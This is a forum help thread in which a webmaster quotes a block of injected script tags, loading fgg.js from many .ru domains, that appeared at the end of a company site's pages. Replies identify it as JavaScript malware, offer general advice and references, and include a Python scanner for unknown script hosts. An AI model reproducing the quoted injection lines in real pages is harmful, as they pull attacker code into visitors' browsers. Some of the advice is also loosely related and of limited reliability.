Dear All,

I face a strange problem. All of a sudden, on our company website, the script below gets included automatically at the end of the body tag, i.e., above the </body> tag. Any idea how to rectify this problem? Is this some kinda virus? Do you know any sites that have the solution?

<script src=http://www.4cnw.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.bnrc.ru/fgg.js></script><script src=http://www.keje.ru/fgg.js></script><script src=http://www.90mc.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.nudk.ru/fgg.js></script><script src=http://www.bnrc.ru/fgg.js></script><script src=http://www.jvke.ru/fgg.js></script><script src=http://www.gb53.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.90mc.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script>

Your thinking is right...
I think it's all because of one virus called JavaScript malware...
Scan all your web pages with an antivirus scanner and find out what the exact virus is...
Find the source of it...
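One way to do the "scan all your web pages" step, as an added example that is not part of any post in this thread: a Python sketch that lists every `<script src=...>` host in a page or site directory that is not on an allowlist, including unquoted `src=` values like the ones in the question. `ALLOWED_HOSTS`, the file extensions and the hosts in `SAMPLE` are assumptions made up for the example.

```python
from collections import Counter
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlsplit

# Assumption: the hosts this site legitimately loads scripts from.
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}
PAGE_SUFFIXES = {".html", ".htm", ".php", ".asp", ".aspx"}  # assumption

# Constructed sample page: two unknown hosts appended before </body>.
SAMPLE = (
    '<html><body><script src="/js/app.js"></script><p>Hello</p>'
    "<script src=http://www.injected-a.example/x.js></script>"
    "<script src=http://www.injected-b.example/x.js></script>"
    "<script src=http://www.injected-a.example/x.js></script>"
    "<script src='https://cdn.example.com/lib.js'></script></body></html>"
)

class ScriptSrcCollector(HTMLParser):
    """Collect the src of every <script> tag, quoted or unquoted."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag == "script" else None
        if src:
            self.sources.append(src.strip())

def foreign_script_hosts(html, allowed_hosts=ALLOWED_HOSTS):
    """Count script hosts that are not allowlisted; relative URLs are same-origin."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    hosts = Counter()
    for src in parser.sources:
        host = (urlsplit(src).hostname or "").lower()
        if host and host not in allowed_hosts:
            hosts[host] += 1
    return hosts

def scan_tree(root, allowed_hosts=ALLOWED_HOSTS):
    """Map each page file under root to its non-allowlisted script hosts."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PAGE_SUFFIXES:
            hits = foreign_script_hosts(path.read_text(errors="replace"), allowed_hosts)
            if hits:
                findings[str(path)] = hits
    return findings

if __name__ == "__main__":
    print(dict(foreign_script_hosts(SAMPLE)))
```

Run `scan_tree()` against a copy of the web root and compare the flagged files with a known-good backup; that shows which files were modified, not how they were modified.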

OOPS... the Experts Exchange link needs a paid sign-up... But the PDF link was useful... but too technical for me, and it made me a bit scared of the vulnerabilities... Anyway, thankz so much

Do this first as first aid:
• Do not use the firewall for authentication: All http services in the intranet should employ authentication mechanisms on their own.
• Change all default passwords on home appliances: Authentication is useless if the password is known.
• Disable JavaScript: Enable JavaScript only for trusted pages that really require JavaScript to function.
This does not provide protection for the case that one of these pages was victim of an XSS [2] attack, but it reduces the attack surface significantly.

Check these:
References
[1] Jesse Burns. Cross site reference forgery - an introduction to a common web application weakness. Whitepaper, https://www.isecpartners.com/documents/XSRF Paper.pdf, 2005.
[2] David Endler. The evolution of cross-site scripting attacks. Whitepaper, iDefense Inc., http://www.cgisecurity.com/lib/XSS.pdf, May 2002.
[3] Jeremiah Grossman. Javascript malware, port scanning, and beyond. Posting to the websecurity mailing list, http://www.webappsec.org/lists/websecurity/archive/2006-07/msg00097.html, July 2006.
[4] Jeremiah Grossman and TC Niedzialkowski. Hacking intranet websites from the outside. Talk at Black Hat USA 2006, http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf, August 2006.
